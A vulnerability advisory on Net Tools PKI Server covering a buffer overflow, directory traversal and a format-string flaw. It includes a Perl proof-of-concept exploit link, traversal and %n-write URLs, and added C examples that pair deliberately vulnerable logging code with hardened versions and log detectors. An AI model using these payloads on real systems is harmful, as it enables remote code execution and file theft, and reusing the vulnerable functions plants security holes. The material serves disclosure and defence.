COMMAND
PKI Server
SYSTEMS AFFECTED
Net Tools PKI server 1.0 for NT (including hotfix 1 and 2)
PROBLEM
The following is based on a CORE SDI security advisory. While
investigating the exploitability of a buffer overflow in the Net
Tools PKI Server from Network Associates Inc., CORE SDI discovered
three new vulnerabilities that are not fixed by hotfix 1, which was
released to address the problems reported by Jim Stickley of
Garrison Technologies Inc.:
http://oliver.efri.hr/~crv/security/bugs/Others/pki.html
Problem #1: Buffer overflow in strong.exe
=========================================
A buffer overflow in the web server component of the Net Tools
PKI server allows a remote attacker to execute arbitrary code as
SYSTEM on the machine running it.
To determine whether anyone has attempted to exploit this
vulnerability, check the enroll-access.log and the
admin-access.log files in the WebServer/logs directory of your
Net Tools PKI Server installation. Search for any log entries
which are excessively long (greater than 500 characters). Each
log entry can then be examined to see the IP address of the
computer that submitted the request.
The impact is remote, unauthenticated access to the PKI Server and
execution of arbitrary commands as the user running the enrollment
server (SYSTEM).
Strong.exe is the web server component of the PKI Server. It
services requests over SSL on ports 443/tcp, 444/tcp and 445/tcp
(the default ports). Connections to port 443/tcp require both
client and server authentication using certificates, but
connections to port 444/tcp require no client authentication, so
any user with network connectivity to the PKI server can connect
via HTTPS to that port.
The service running on port 443/tcp is the Administrative Web
Server, which is why mutual authentication is required there. The
service running on port 444/tcp is the Enrollment Web Server and
does not require a client-side certificate by default. Both web
servers are virtual servers serviced by the same strong.exe
process.
A buffer overflow is present in the function that generates log
data. It allows the stack to be overwritten with user-supplied data
passed to the server as the URL of an HTTPS request:
https://host:444/<2965 'A' chars>
EAX=66206465 EBX=00F3E1C0 ECX=01FFF224 EDX=20414141
EDI=00000000 EBP=01FFFE60 ESP=01FFF258 EIP=0040977B
The value in EAX is part of the string (DATE+PATH+FILE+REASON)
that gets logged, detailing the reason for the failure (0x66206465
is the ASCII text "ed f" read little-endian, and EDX holds "AAA "
from the request). Since it is not a valid address, an access
violation is raised a few instructions after the overwrite:
mov ecx,[eax+000000E4]
The request above does not reach the saved return address: the
server dies before EIP is overwritten. A slight variation of it,
however, lets an attacker overwrite EBP and EIP and, by carefully
overwriting local variables as well, control the execution of
arbitrary code on the target machine.
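The following is an added example in C, not code from the advisory or from Network Associates; the internals of strong.exe are not public. It models the bug class described above for Problem #1: a log line built from DATE+PATH+FILE+REASON in a fixed-size stack buffer with no length check, where PATH comes straight from the request URL, beside the bounded version a fix would use. The buffer size, the field layout, the function names and the URL length limit are assumptions.

```c
#include <stdbool.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LOG_LINE_CAP 512     /* assumed size of the logger's stack buffer */
#define PROBE_URL_LEN 2965   /* length of the 'A' run in the advisory's probe */

/* Bytes the finished entry needs (without the NUL), so a caller can see
 * by how much the vulnerable version overruns its buffer. */
size_t log_entry_length(const char *date, const char *path,
                        const char *file, const char *reason)
{
    return strlen(date) + strlen(path) + strlen(file) + strlen(reason) + 3;
}

/* Vulnerable shape: sprintf() into a fixed stack buffer, length never
 * checked. With a 2965-byte path it writes about 2.5 KB past 'line',
 * over the saved EBP and the return address, which is what the Perl
 * proof of concept below relies on. Comparison only; never feed it
 * untrusted input. */
void format_log_entry_vuln(char *out, const char *date, const char *path,
                           const char *file, const char *reason)
{
    char line[LOG_LINE_CAP];
    sprintf(line, "%s %s %s %s", date, path, file, reason);
    strcpy(out, line);
}

/* Hardened shape: the buffer size travels with the buffer, the write is
 * bounded, and truncation is reported instead of silently ignored. */
bool format_log_entry_safe(char *out, size_t cap, const char *date,
                           const char *path, const char *file,
                           const char *reason)
{
    int n = snprintf(out, cap, "%s %s %s %s", date, path, file, reason);
    if (n < 0) { out[0] = '\0'; return false; }
    return (size_t)n < cap;   /* false: the entry was truncated */
}

/* Input-side check a fix would also want: refuse over-long URLs before
 * they reach any formatting routine. The limit is an assumption. */
bool url_length_ok(const char *url, size_t limit)
{
    return strlen(url) <= limit;
}

/* Build the advisory's probe path: "/" followed by 2965 'A' characters.
 * Caller frees the result. */
char *make_probe_url(void)
{
    char *url = malloc(PROBE_URL_LEN + 2);
    url[0] = '/';
    memset(url + 1, 'A', PROBE_URL_LEN);
    url[PROBE_URL_LEN + 1] = '\0';
    return url;
}

int main(void)
{
    char line[LOG_LINE_CAP];
    char *probe = make_probe_url();
    /* Constructed field values; the real log layout is not known. */
    const char *date = "[Tue Jun 27 19:47:33 2000]";
    const char *file = "enroll-server";
    const char *reason = "File does not exist";

    printf("probe entry needs %zu bytes, buffer holds %d\n",
           log_entry_length(date, probe, file, reason), LOG_LINE_CAP);
    bool complete = format_log_entry_safe(line, sizeof line, date, probe,
                                          file, reason);
    printf("bounded formatter: %s (%zu bytes kept)\n",
           complete ? "complete" : "truncated", strlen(line));
    printf("url_length_ok(probe, 1024) = %d\n", url_length_ok(probe, 1024));
    free(probe);
    return 0;
}
```

The bounded formatter keeps the first 511 bytes of the entry and reports the truncation; the unbounded one is left in the block only so the two shapes can be compared side by side.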
A proof-of-concept Perl script exemplifies this:
#!/usr/bin/perl
# NAI NetTools PKI SERVER 1.0 - Long URL Stack Overflow Exploit
# Replace host and port and create the html file:
#   ./pkiluso.pl > test.html
# Open the html in an SSL-capable browser and click on the link. Poof!
# Juliano Rizzo (c) 2000 juliano@core-sdi.com
use strict;
use warnings;

my $host = "localhost";
my $port = "444";
my $shell_code = "\x90\x90\x90\x90";   # placeholder: NOPs stand in for real shellcode
# We can set the values of EIP and EBP; our code is on the stack
# at 0x01613A2E.
my $eip = "\x2E\x3A\x61\x01";  # 0x01613A2E (URL as read from the socket)
#my $eip = "\x64\x83\x40%00";  # 0x00408364 (CALL EBP)
my $ebp = "\xCB\xF2\x01\x02";  # 0x0200F2CB (the 00 byte truncates the string)
my $noplen = 2965 - length($shell_code);
print "<html><body><a href=\"https://" . $host . ":" . $port . "/";
print "\x90" x $noplen;
print $shell_code . $ebp . $eip . "\x18\x6B\x62\x01\x18\x6B\x62\x01\x18\x6B\x62\x01";
print "\">Click here to exploit.!</a></body></html>";
Problem #2: Directory traversal vulnerability
=============================================
The default installation of Net Tools PKI server allows a remote
attacker to view and download any file residing on the server. To
determine whether anyone has attempted to exploit this
vulnerability, check the enroll-access.log and the
admin-access.log files in the WebServer/logs directory of your Net
Tools PKI Server installation. Search for any log entries
containing "..\" within them. Each log entry can then be examined
to see the IP address of the computer that submitted the request.
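The log checks the advisory gives for Problem #1 (entries longer than 500 characters) and for Problem #2 (entries containing "..\") are implemented below over a few constructed access-log lines. This is an added example, not part of the advisory or of the product. The advisory does not show the access-log format, so the sample lines and the client-address extraction assume a common-log-format layout with the client address as the first field; the third check, for the double-encoded "%25%25" of the Problem #3 probe, goes beyond the advisory's guidance and assumes the URL is logged as received, before decoding.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define LONG_ENTRY_THRESHOLD 500   /* the advisory's "greater than 500" */

enum { FLAG_LONG = 1, FLAG_TRAVERSAL = 2, FLAG_FORMAT = 4 };

/* Returns a bitmask of the checks one log line trips; 0 means clean. */
int classify_log_line(const char *line)
{
    int flags = 0;
    if (strlen(line) > LONG_ENTRY_THRESHOLD)
        flags |= FLAG_LONG;              /* Problem #1: over-long request */
    if (strstr(line, "..\\") != NULL)
        flags |= FLAG_TRAVERSAL;         /* Problem #2: "..\" in the URL */
    /* Beyond the advisory: "%25%25" is the double-encoded '%' used by the
     * Problem #3 probe. Assumes the raw, undecoded URL is what gets logged. */
    if (strstr(line, "%25%25") != NULL)
        flags |= FLAG_FORMAT;
    return flags;
}

/* Copy the first whitespace-delimited field (the client address under the
 * assumed layout) so a flagged entry can be attributed to a host. */
int client_address(const char *line, char *out, size_t cap)
{
    size_t n = strcspn(line, " \t");
    if (n == 0 || n >= cap) return 0;
    memcpy(out, line, n);
    out[n] = '\0';
    return 1;
}

/* Constructed sample entry whose URL is url_len 'A's long; caller frees. */
char *make_long_entry(const char *addr, size_t url_len)
{
    const char *head = " - - [27/Jun/2000:19:47:33 -0300] \"GET /";
    const char *tail = " HTTP/1.0\" 200 -";
    size_t n = strlen(addr) + strlen(head) + url_len + strlen(tail);
    char *entry = malloc(n + 1);
    char *p = entry;
    p += sprintf(p, "%s%s", addr, head);
    memset(p, 'A', url_len);
    p += url_len;
    strcpy(p, tail);
    return entry;
}

/* Walk a set of lines, describe each hit on 'report' (may be NULL), and
 * return how many lines were flagged. */
int scan_log(const char **lines, int count, FILE *report)
{
    int hits = 0;
    char addr[64];
    for (int i = 0; i < count; i++) {
        int f = classify_log_line(lines[i]);
        if (f == 0) continue;
        hits++;
        if (!client_address(lines[i], addr, sizeof addr)) strcpy(addr, "?");
        if (report)
            fprintf(report, "line %d from %s:%s%s%s\n", i + 1, addr,
                    (f & FLAG_LONG) ? " long-entry" : "",
                    (f & FLAG_TRAVERSAL) ? " traversal" : "",
                    (f & FLAG_FORMAT) ? " format-string" : "");
    }
    return hits;
}

int main(void)
{
    char *long_entry = make_long_entry("10.0.0.7", 2965);
    /* Constructed sample log, not taken from a real installation. */
    const char *lines[] = {
        "10.0.0.5 - - [27/Jun/2000:19:40:01 -0300] \"GET /enroll.xuda HTTP/1.0\" 200 -",
        "10.0.0.9 - - [27/Jun/2000:19:47:33 -0300] \"GET /..\\..\\..\\..\\..\\autoexec.bat HTTP/1.0\" 200 -",
        long_entry,
        "10.0.0.9 - - [27/Jun/2000:19:50:12 -0300] \"GET /%25%25s.xuda HTTP/1.0\" 500 -",
    };
    int hits = scan_log(lines, 4, stdout);
    printf("%d of 4 entries flagged\n", hits);
    free(long_entry);
    return 0;
}
```

To run it over real files, read enroll-access.log and admin-access.log line by line and pass each line to classify_log_line; the length test is on the whole entry, as the advisory states, not only on the URL.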
The impact is remote, unauthenticated read access to any file on
the PKI server.
By specifying '..\' in HTTPS requests to the enrollment server, an
attacker can navigate the server's file system and view or download
any file whose name is known. By default the enrollment server uses
\Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server
as the web root directory, so if a file name is known (e.g.
autoexec.bat) the attacker only needs to supply the remaining path
components to reach it; the five '..\' components below climb from
enroll-server to the root of the drive:
https://host:444/..\..\..\..\..\autoexec.bat
will display the contents of the file in the browser. If a
filename is not known, the web server reveals its web root
directory in the error message shown to the client:
https://host:444/..\..\pirulo.pdf will result in:
File Not Found
The requested URL /..\..\pirulo.pdf was not found on this server.
There was also some additional information available about the
error:
[Tue Jun 27 19:47:33 2000] access to C:\Program Files\Network Associates\Net Tools PKI Server\WebServer\enroll-server/..\..\pirulo.pdf failed for a.b.c.d, reason: File does not exist
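The check the enrollment server was missing is shown below as an added example in C; it is not code from the advisory or from Network Associates. It percent-decodes the request path first (a check done before decoding is bypassed by "%2e%2e%5c"), splits it on both '/' and '\' (Windows accepts either separator, and the advisory's probe uses "..\"), and refuses any path whose ".." components would climb above the web root instead of silently clamping it. Function names and buffer sizes are assumptions; the web root is the default one quoted above.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    c = tolower(c);
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    return -1;
}

/* Decode %XX escapes. Returns 0 on a malformed escape or on an encoded
 * NUL (%00), which would silently truncate the path in later C string
 * calls. Decoding must happen BEFORE the ".." check. */
int percent_decode(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (size_t i = 0; in[i] != '\0'; i++) {
        int c = (unsigned char)in[i];
        if (c == '%') {
            int hi = hexval((unsigned char)in[i + 1]);
            int lo = in[i + 1] ? hexval((unsigned char)in[i + 2]) : -1;
            if (hi < 0 || lo < 0) return 0;
            c = hi * 16 + lo;
            if (c == 0) return 0;
            i += 2;
        }
        if (o + 1 >= cap) return 0;
        out[o++] = (char)c;
    }
    out[o] = '\0';
    return 1;
}

/* Normalise a decoded path into "seg/seg/..." relative to the root.
 * "." and empty segments are dropped; ".." pops the previous segment and
 * is rejected (return 0) when there is nothing left to pop. */
int normalize_under_root(const char *path, char *out, size_t cap)
{
    size_t i = 0, o = 0;
    out[0] = '\0';
    while (path[i] != '\0') {
        while (path[i] == '/' || path[i] == '\\') i++;   /* skip separators */
        if (path[i] == '\0') break;
        size_t start = i;
        while (path[i] != '\0' && path[i] != '/' && path[i] != '\\') i++;
        size_t len = i - start;
        if (len == 1 && path[start] == '.') continue;
        if (len == 2 && path[start] == '.' && path[start + 1] == '.') {
            if (o == 0) return 0;                        /* above the root */
            while (o > 0 && out[o - 1] != '/') o--;      /* pop last segment */
            if (o > 0) o--;                              /* and its '/' */
            out[o] = '\0';
            continue;
        }
        if (o + (o ? 1 : 0) + len + 1 > cap) return 0;
        if (o) out[o++] = '/';
        memcpy(out + o, path + start, len);
        o += len;
        out[o] = '\0';
    }
    return 1;
}

/* Full check: returns 1 and writes the file system path to 'out' when the
 * request stays inside 'web_root', 0 when it must be refused. */
int resolve_request(const char *url_path, const char *web_root,
                    char *out, size_t cap)
{
    char decoded[1024], rel[1024];
    if (!percent_decode(url_path, decoded, sizeof decoded)) return 0;
    if (!normalize_under_root(decoded, rel, sizeof rel)) return 0;
    int n = snprintf(out, cap, "%s/%s", web_root, rel);
    return n > 0 && (size_t)n < cap;
}

int main(void)
{
    const char *root = "C:/Program Files/Network Associates/"
                       "Net Tools PKI Server/WebServer/enroll-server";
    const char *probes[] = {
        "/..\\..\\..\\..\\..\\autoexec.bat",   /* the advisory's probe */
        "/%2e%2e%5c%2e%2e%5cautoexec.bat",     /* same thing, percent-encoded */
        "/enroll/..\\index.htm",               /* ".." that stays inside */
        "/forms/./enroll.xuda",
    };
    char out[512];
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        int ok = resolve_request(probes[i], root, out, sizeof out);
        printf("%-36s -> %s\n", probes[i], ok ? out : "REFUSED");
    }
    return 0;
}
```

Refusing rather than clamping matters for the detection side too: a request that needed clamping is a probe and deserves a log entry of its own.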
Problem #3: Format strings with user supplied data
==================================================
The Net Tools PKI Server fails to validate the data passed as
arguments to the server's logging routines, which allows a remote
attacker to execute arbitrary code as SYSTEM on the machine running
it.
The impact is remote, unauthenticated access to the PKI Server and
execution of arbitrary commands as the user running the enrollment
server (SYSTEM).
The user-supplied URL is processed by Strong.exe and, if the .XUDA
extension is found, the request is forwarded to XUDAD.EXE for
further processing. Prior to this hand-off the URL string is
parsed, filtered for metacharacters and passed to a function that
logs the request. Somewhere along this processing path the user-
supplied data becomes the format string of a formatted output
function similar to the ANSI C sprintf(). This allows a remote
attacker to supply data that forces that function to overwrite
arbitrary portions of the process memory, causing either a denial
of service or the execution of arbitrary code. As an example, the
following URL will cause a DoS:
https://host:444/%25%25s.xuda
Note that the hex value 0x25 represents the ASCII character '%', so
the URL string is decoded once to "%%s.xuda" and then, because the
server decodes it a second time, to "%s.xuda"; the %s conversion
then consumes a pointer argument that was never supplied and the
server crashes dereferencing it. A more elaborate attack might try
to overwrite the return address on the stack to force the server
into executing arbitrary code. In the proof-of-concept URL below,
the bytes %3c%b9%ff%01 at the start of the string form the
little-endian address 0x01ffb93c, the run of %x conversions walks
up the stack until the %n directive's pointer argument lines up
with that address, and %n then writes the number of characters
output so far to it:
https://host:444/xxx%3c%b9%ff%01%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25%25x%25x%25n.xuda
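The bug class behind Problem #3 is shown below as an added example in C, not code from the advisory or from Network Associates: a printf-style logging routine handed the decoded request URL as its format argument, beside the fixed call site, a directive counter for validating or triaging such input, and percent-doubling as a defence in depth for call sites that cannot be rewritten. The function names, the line buffer and the decoded URLs used as input are assumptions; the decoding chain "%25%25s" to "%%s" to "%s" is the one the advisory describes.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

static char last_line[256];

/* The printf-style logger. The format attribute lets the compiler flag
 * the vulnerable call site below with -Wformat-security. */
void log_printf(const char *fmt, ...) __attribute__((format(printf, 1, 2)));
void log_printf(const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(last_line, sizeof last_line, fmt, ap);
    va_end(ap);
}

const char *last_log_line(void) { return last_line; }

/* Vulnerable call site: attacker data IS the format string. With the
 * decoded URL "%s.xuda" the logger reads a pointer argument that was never
 * passed and dereferences it (the DoS); "%n" directives write to memory.
 * Kept only for comparison; never call it with undecoded attacker data. */
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"
void log_request_vuln(const char *decoded_url)
{
    log_printf(decoded_url);
}
#pragma GCC diagnostic pop

/* Fixed call site: the format is a constant and the URL is an argument. */
void log_request_safe(const char *decoded_url)
{
    log_printf("Request: %s", decoded_url);
}

/* Count the conversions a string would trigger as a format. "%%" is a
 * literal percent and counts for nothing; '*writes' receives the number
 * of "%n" directives, the ones that turn a read into a memory write. */
int count_conversions(const char *s, int *writes)
{
    int count = 0;
    if (writes) *writes = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        count++;
        /* skip flags, width, precision and length modifiers */
        const char *q = p + 1;
        while (*q && strchr("-+ #0123456789.hlLqjzt", *q)) q++;
        if (*q == 'n' && writes) (*writes)++;
        if (*q) p = q;
    }
    return count;
}

/* Defence in depth for legacy call sites: double every '%' so the string
 * is inert as a format. Returns 0 if 'out' is too small. */
int escape_percent(const char *in, char *out, size_t cap)
{
    size_t o = 0;
    for (; *in; in++) {
        size_t need = (*in == '%') ? 2 : 1;
        if (o + need >= cap) return 0;
        out[o++] = *in;
        if (*in == '%') out[o++] = '%';
    }
    out[o] = '\0';
    return 1;
}

int main(void)
{
    const char *dos_url = "%s.xuda";       /* the advisory's DoS URL, decoded twice */
    /* Shortened stand-in for the advisory's %x...%n probe after decoding. */
    const char *write_probe = "xxx%x%x%x%x%x%x%x%x%n.xuda";
    int writes;
    char escaped[128];

    int n1 = count_conversions(dos_url, &writes);
    printf("\"%s\": %d conversion(s)\n", dos_url, n1);
    int n2 = count_conversions(write_probe, &writes);
    printf("\"%s\": %d conversions, %d of them %%n\n", write_probe, n2, writes);

    log_request_safe(dos_url);
    printf("fixed call site logged: %s\n", last_log_line());

    escape_percent(dos_url, escaped, sizeof escaped);
    log_request_vuln(escaped);             /* "%%s.xuda" is now inert */
    printf("legacy call site with escaped input logged: %s\n", last_log_line());
    return 0;
}
```

Escaping is the fallback, not the fix: the real correction is the constant format string in log_request_safe, which needs no knowledge of what the input contains.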
SOLUTION
Network Associates Inc. has released Hotfix 3 for the Net Tools
PKI Server. It corrects the three problems. It can be obtained
from:
http://www.nai.com/asp_set/download/upgrade/find.asp
Or contact Network Associates Technical support at 1-800-722-3709.